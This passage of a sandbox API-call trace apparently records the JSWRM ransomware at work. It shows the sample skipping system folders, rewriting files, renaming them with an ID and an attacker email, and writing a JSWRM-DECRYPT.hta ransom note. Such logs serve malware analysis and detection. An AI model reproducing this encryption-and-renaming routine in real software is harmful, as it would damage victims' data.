returned 1 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.272] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0060.272] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a93df5e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a93df5e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a963eb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.272] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.273] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0060.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0060.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0060.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0060.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0060.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0060.273] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0060.273] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0060.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0060.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0060.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0060.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0060.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0060.274] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.274] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=79996) returned 1 [0060.274] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13870) returned 0x2471a8 [0060.274] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x13870, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x13870, lpOverlapped=0x0) returned 1 [0060.280] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.281] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x13870, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x13870, lpOverlapped=0x0) returned 1 [0060.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.282] CloseHandle (hObject=0x3d4) returned 1 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0060.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0060.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0060.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0060.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.284] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0060.285] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0060.285] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0060.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0060.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241380, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0060.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0060.286] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.286] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.286] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Client", cAlternateFileName="")) returned 1 [0060.286] lstrcmpiW (lpString1="Client", lpString2=".") returned 1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="..") returned 1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="...") returned 1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="windows") returned -1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="recovery") returned -1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="perflogs") returned -1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="documents and settings") returned -1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="$RECYCLE.BIN") returned 1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="system volume information") returned -1 [0060.286] lstrcmpiW (lpString1="Client", lpString2="msocache") returned -1 [0060.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0060.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0060.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0060.287] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\client\\jswrm-decrypt.hta")) returned 0xffffffff [0060.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0060.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0060.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0060.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0060.288] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\client\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.294] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.294] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.295] CloseHandle (hObject=0x450) returned 1 [0060.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0060.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0060.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226730 [0060.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0060.295] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\client\\jswrm-decrypt.hta")) returned 0x20 [0060.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226730 | out: hHeap=0x1e0000) returned 1 [0060.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0060.295] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a98a3b2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232140 [0060.295] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.296] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a98a3b2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0060.296] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.296] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.296] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a98a3b2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a98a3b2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a98a3b2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.296] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.296] lstrcmpiW 